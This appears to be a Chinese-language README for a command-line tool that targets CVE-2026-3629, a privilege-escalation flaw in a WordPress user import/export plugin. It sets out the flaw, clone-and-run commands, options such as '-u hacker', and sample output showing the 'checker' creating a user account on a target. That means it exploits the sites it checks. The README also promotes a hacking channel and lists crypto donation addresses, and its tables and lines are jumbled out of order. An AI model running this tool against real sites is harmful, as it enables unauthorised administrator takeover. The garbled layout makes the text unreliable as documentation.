
WordPress Privilege Escalation Checker
一款用于检测 CVE-2026-3629 的命令行工具,该漏洞是 "Import and export users and customers" WordPress 插件中的一个严重权限提升漏洞。
第一时间获取最新的安全工具、漏洞信息及黑客技术!
👉 频道: @PySecTools
描述: 该插件的 save_extra_user_profile_fields 函数未能正确限制用户元键。wp_capabilities 键未被阻止,导致未认证的攻击者能够获取管理员权限。
受影响版本: ≤ 1.29.7(已在 1.29.8+ 修复)
利用前提(两者均需满足):
wp_capabilities 列的 CSV 文件影响: 完全管理员访问权限、站点接管、恶意插件安装。
发现者: Supanat Konprom | 公开日期: 2026年3月21日
git clone https://github.com/PySecTools/CVE-2026-3629-Checker.git
cd CVE-2026-3629-Checker
pip install requests colorama
python3 cve_2026_3629_checker.py <URL> [选项]
| 命令 | 描述 |
|---|---|
python3 cve_2026_3629_checker.py http://example.com | 使用默认设置运行 |
╔══════════════════════════════════════════════════════╗
║ WordPress Privilege Escalation Checker ║
║ Single Target Mode ║
╚══════════════════════════════════════════════════════╝
════════════════════════════════════════
Target: http://vulnerable-site.com
════════════════════════════════════════
[✓] VULNERABLE! User 'test_username' created successfully!
[+] URL: http://vulnerable-site.com
════════════════════════════════════════
[✓] RESULT: VULNERABLE ✓
════════════════════════════════════════
[✗] SAFE (Registration is blocked/disabled)
════════════════════════════════════════
[✗] RESULT: NOT VULNERABLE ✗
════════════════════════════════════════
仅用于教育和授权测试。 仅在你拥有或获得书面许可的系统上使用。未经授权的使用属于违法行为。
USDT (TRC20): TNia5W6TameZ81y6FaSU3RhefYPnFDBZou
USDT (BSC - BEP20): 0x494f424e34840b21597ad75fc092a8d200655257
MIT 许可证 - 详见 LICENSE 文件。
⭐ 如果对你有帮助,请给这个仓库点个 Star!
| 属性 | 值 |
|---|
| CVE 编号 | CVE-2026-3629 |
| CVSS 分数 | 8.1 (高) |
| 攻击向量 | 网络 |
| 所需权限 | 无 |
| CWE | CWE-269 (权限管理不当) |
python3 cve_2026_3629_checker.py http://example.com -u hacker -e [email protected] | 自定义用户名和邮箱 |
python3 cve_2026_3629_checker.py http://example.com -t 15 | 设置超时时间为 15 秒 |
python3 cve_2026_3629_checker.py https://target.com -u admin -e [email protected] -t 20 | 全部选项 |
| 参数 | 默认值 | 描述 |
|---|
url | 必需 | 目标 WordPress URL |
-u, --username | test_username | 测试用户名 |
-e, --email | [email protected] | 测试邮箱 |
-t, --timeout | 30 | 超时时间(秒) |